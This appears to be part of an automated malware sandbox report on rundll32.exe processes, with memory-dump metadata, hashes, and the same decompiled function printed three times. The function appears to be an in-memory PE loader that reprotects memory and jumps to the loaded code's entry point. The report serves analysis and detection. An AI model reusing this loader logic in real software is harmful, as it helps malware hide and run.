                                                                                                        • Source File: 00000010.00000002.576373356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: \
                                                                                                        • API String ID: 544645111-2967466578
                                                                                                        • Opcode ID: a041bd26e43ff3a944734d4aa3aa9c20bed6228c08a409fb84ffae1c43d34223
                                                                                                        • Instruction ID: f41e1cbefec6106041e0044b76b55bf4ef32d44bc7cb1b9b6efc9916fbb197d0
                                                                                                        • Opcode Fuzzy Hash: a041bd26e43ff3a944734d4aa3aa9c20bed6228c08a409fb84ffae1c43d34223
                                                                                                        • Instruction Fuzzy Hash: 58B19DB4E042188FCB14CFA9C980A9DFBF1BF88310F15856AE959AB352D334AD41CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 009E1C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.576373356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction ID: 23c1c362e64806a429d77ffa791f2343118596df836117312cb4c5c735cc4c27
                                                                                                        • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction Fuzzy Hash: 8A41C3B5E042199FDB04CFA9C4906AEBBF1FF88714F14852DE848AB340D375A881CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 5332 Parent PID: 4240 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 007B193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E007B193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x7b4418 = 1;
				asm("movaps xmm0, [0x7b3010]");
				asm("movups [0x7b4428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E007B173B();
				E007B21C2(_v68,  *_v48, _v60);
				E007B173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x7b4418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E007B173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}





























































                                                                                                        0x007b1949
                                                                                                        0x007b1957
                                                                                                        0x007b195e
                                                                                                        0x007b1961
                                                                                                        0x007b196b
                                                                                                        0x007b1972
                                                                                                        0x007b197c
                                                                                                        0x007b1982
                                                                                                        0x007b198b
                                                                                                        0x007b1994
                                                                                                        0x007b1997
                                                                                                        0x007b199b
                                                                                                        0x007b19a3
                                                                                                        0x007b19aa
                                                                                                        0x007b19ad
                                                                                                        0x007b19b0
                                                                                                        0x007b19b3
                                                                                                        0x007b19b6
                                                                                                        0x007b19d0
                                                                                                        0x007b19d6
                                                                                                        0x007b19d9
                                                                                                        0x007b19e1
                                                                                                        0x007b19e5
                                                                                                        0x007b19e8
                                                                                                        0x007b19eb
                                                                                                        0x007b19ee
                                                                                                        0x007b19f1
                                                                                                        0x007b1a0c
                                                                                                        0x007b1a28
                                                                                                        0x007b1a4d
                                                                                                        0x007b1a4f
                                                                                                        0x007b1a58
                                                                                                        0x007b1a5b
                                                                                                        0x007b1a65
                                                                                                        0x007b1a68
                                                                                                        0x007b1a6b
                                                                                                        0x007b1a6e
                                                                                                        0x007b1a71
                                                                                                        0x007b1a8c
                                                                                                        0x007b1a8c
                                                                                                        0x007b1b76
                                                                                                        0x007b1b79
                                                                                                        0x007b1aa5
                                                                                                        0x007b1aa8
                                                                                                        0x007b1b84
                                                                                                        0x007b1b84
                                                                                                        0x007b1b9b
                                                                                                        0x007b1bc3
                                                                                                        0x007b1bcf
                                                                                                        0x007b1bd2
                                                                                                        0x007b1bd6
                                                                                                        0x007b1bda
                                                                                                        0x007b1be1
                                                                                                        0x007b1be7
                                                                                                        0x007b1be9
                                                                                                        0x007b1bf2
                                                                                                        0x007b1c03
                                                                                                        0x007b1c09
                                                                                                        0x007b1c0c
                                                                                                        0x007b1c0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x007b1c11
                                                                                                        0x007b1b84
                                                                                                        0x007b1c31
                                                                                                        0x007b1c3f
                                                                                                        0x007b1c47
                                                                                                        0x007b1c4a
                                                                                                        0x007b1c4c
                                                                                                        0x007b1c52
                                                                                                        0x007b1c5e
                                                                                                        0x007b1c64
                                                                                                        0x007b1c67
                                                                                                        0x007b1c6a
                                                                                                        0x007b1ae4
                                                                                                        0x007b1ae4
                                                                                                        0x007b1af7
                                                                                                        0x007b1afd
                                                                                                        0x007b1b03
                                                                                                        0x007b1b09
                                                                                                        0x007b1b0f
                                                                                                        0x007b1b15
                                                                                                        0x007b1b1b
                                                                                                        0x007b1b1e
                                                                                                        0x007b1b21
                                                                                                        0x007b1b29
                                                                                                        0x007b1b31
                                                                                                        0x007b1b37
                                                                                                        0x007b1b3d
                                                                                                        0x007b1b43
                                                                                                        0x007b1b49
                                                                                                        0x007b1b57
                                                                                                        0x007b1c24
                                                                                                        0x007b1c2a
                                                                                                        0x007b1c2a
                                                                                                        0x007b1ac9

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.576328046.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: \
                                                                                                        • API String ID: 544645111-2967466578
                                                                                                        • Opcode ID: cbf3db9c13e7e8aea870133898e396bf73ace9a0035e5e581946489edb09660e
                                                                                                        • Instruction ID: b363854ba4aee871b724e149382cda9d2dfdb5ffa0ca1a3a8d54cbaf9ed9d35d
                                                                                                        • Opcode Fuzzy Hash: cbf3db9c13e7e8aea870133898e396bf73ace9a0035e5e581946489edb09660e
                                                                                                        • Instruction Fuzzy Hash: 12B19CB5D00218CFCB14CFA9C990A9DFBF1BF88310F55856AE959AB352D334A941CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 007B1C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.576328046.00000000007B0000.00000040.00000001.sdmp, Offset: 007B0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction ID: ff5046869fa01a8ea07c90371e23e63652a189644586277d8287eeca1cc6442b
                                                                                                        • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction Fuzzy Hash: F141D0B5E0421A8FDB04CFA8C4946EEBBF1FF48314F548569E848AB340D379A891CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Analysis Process: rundll32.exe PID: 5492 Parent PID: 4240 rundll32.exeCOMMON

                                                                                                        Executed Functions

                                                                                                        Function 00D9193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E00D9193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0xd94418 = 1;
				asm("movaps xmm0, [0xd93010]");
				asm("movups [0xd94428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E00D9173B();
				E00D921C2(_v68,  *_v48, _v60);
				E00D9173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0xd94418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E00D9173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}





























































                                                                                                        0x00d91949
                                                                                                        0x00d91957
                                                                                                        0x00d9195e
                                                                                                        0x00d91961
                                                                                                        0x00d9196b
                                                                                                        0x00d91972
                                                                                                        0x00d9197c
                                                                                                        0x00d91982
                                                                                                        0x00d9198b
                                                                                                        0x00d91994
                                                                                                        0x00d91997
                                                                                                        0x00d9199b
                                                                                                        0x00d919a3
                                                                                                        0x00d919aa
                                                                                                        0x00d919ad
                                                                                                        0x00d919b0
                                                                                                        0x00d919b3
                                                                                                        0x00d919b6
                                                                                                        0x00d919d0
                                                                                                        0x00d919d6
                                                                                                        0x00d919d9
                                                                                                        0x00d919e1
                                                                                                        0x00d919e5
                                                                                                        0x00d919e8
                                                                                                        0x00d919eb
                                                                                                        0x00d919ee
                                                                                                        0x00d919f1
                                                                                                        0x00d91a0c
                                                                                                        0x00d91a28
                                                                                                        0x00d91a4d
                                                                                                        0x00d91a4f
                                                                                                        0x00d91a58
                                                                                                        0x00d91a5b
                                                                                                        0x00d91a65
                                                                                                        0x00d91a68
                                                                                                        0x00d91a6b
                                                                                                        0x00d91a6e
                                                                                                        0x00d91a71
                                                                                                        0x00d91a8c
                                                                                                        0x00d91a8c
                                                                                                        0x00d91b76
                                                                                                        0x00d91b79
                                                                                                        0x00d91aa5
                                                                                                        0x00d91aa8
                                                                                                        0x00d91b84
                                                                                                        0x00d91b84
                                                                                                        0x00d91b9b
                                                                                                        0x00d91bc3
                                                                                                        0x00d91bcf
                                                                                                        0x00d91bd2
                                                                                                        0x00d91bd6
                                                                                                        0x00d91bda
                                                                                                        0x00d91be1
                                                                                                        0x00d91be7
                                                                                                        0x00d91be9
                                                                                                        0x00d91bf2
                                                                                                        0x00d91c03
                                                                                                        0x00d91c09
                                                                                                        0x00d91c0c
                                                                                                        0x00d91c0f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00d91c11
                                                                                                        0x00d91b84
                                                                                                        0x00d91c31
                                                                                                        0x00d91c3f
                                                                                                        0x00d91c47
                                                                                                        0x00d91c4a
                                                                                                        0x00d91c4c
                                                                                                        0x00d91c52
                                                                                                        0x00d91c5e
                                                                                                        0x00d91c64
                                                                                                        0x00d91c67
                                                                                                        0x00d91c6a
                                                                                                        0x00d91ae4
                                                                                                        0x00d91ae4
                                                                                                        0x00d91af7
                                                                                                        0x00d91afd
                                                                                                        0x00d91b03
                                                                                                        0x00d91b09
                                                                                                        0x00d91b0f
                                                                                                        0x00d91b15
                                                                                                        0x00d91b1b
                                                                                                        0x00d91b1e
                                                                                                        0x00d91b21
                                                                                                        0x00d91b29
                                                                                                        0x00d91b31
                                                                                                        0x00d91b37
                                                                                                        0x00d91b3d
                                                                                                        0x00d91b43
                                                                                                        0x00d91b49
                                                                                                        0x00d91b57
                                                                                                        0x00d91c24
                                                                                                        0x00d91c2a
                                                                                                        0x00d91c2a
                                                                                                        0x00d91ac9

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.658077222.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual
                                                                                                        • String ID: \
                                                                                                        • API String ID: 544645111-2967466578
                                                                                                        • Opcode ID: 6c42f9a9553bf35caa7d4dcf0bce33ab4e56e27a8716447b4f7df8367823ce32
                                                                                                        • Instruction ID: 2903f3915fce9a31637aa94d66f9ed72b441b5e0726632b2dba540405816a344
                                                                                                        • Opcode Fuzzy Hash: 6c42f9a9553bf35caa7d4dcf0bce33ab4e56e27a8716447b4f7df8367823ce32
                                                                                                        • Instruction Fuzzy Hash: 6EB18BB9D043198FCB14CFA9C980A9DFBF1BF88310F55856AE959AB352D330A941CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00D91C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000012.00000002.658077222.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction ID: 27e40813ecab4b17c4236ac902c4f740f0bf1e0c22535c8cf27a413f77cc1c5a
                                                                                                        • Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
                                                                                                        • Instruction Fuzzy Hash: DA41C3B5E0421A9FDB04DFA8C4906AEFBF1FF48714F148529E848AB340D375A841CFA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions